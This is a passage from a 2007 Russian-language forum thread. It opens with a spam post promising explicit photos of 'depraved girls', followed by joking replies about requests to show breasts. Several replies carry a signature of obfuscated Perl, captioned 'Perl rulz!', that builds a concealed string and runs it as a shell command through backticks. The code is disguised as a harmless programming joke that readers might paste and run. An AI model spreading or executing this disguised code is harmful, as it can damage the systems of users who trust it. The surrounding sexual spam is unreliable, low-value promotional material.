Добавлено: Пн Апр 30, 2007 3:26 am Заголовок сообщения: Сунь свой палец ей прямо в...
Приветик всем! Ну че как жизнь? Весна чувствуется или пока нет? Вообщем предлагаю вам немного развлечься . Тут эти несколько развратных девушек очень хотят вам показать свои сиськи :
Трахни меня как в первый раз, я так хочу тебя! Я тут, мой милый!
Оставляйте отзывы, или сразу за дело 5-я просто жесть.
Всем спасибо за внимание.
И вообще, ты уже использовала своё право запроса на просмотр сисек, обратившись к Лобзику. Меня должен был попросить показать сиськи кто-нибудь, у кого ещё не просили показать сиськи. А ты уже просила показать сиськи, и у тебя уже просили показать сиськи, поэтому здесь получился замкнутый круг. Теперь тот, кто ещё не просил показать сиськи не может попросить показать сиськи, не нарушив последовательность и не попросив у того, у кого уже просили показать сиськи. _________________ But all I want is you
я все равно склоняюсь к показанию сисек lostchild и Soul _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Soul
неее, свои я видел.... хотя твои тоже ггг _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Soul
не стесняйся, все свои (= _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!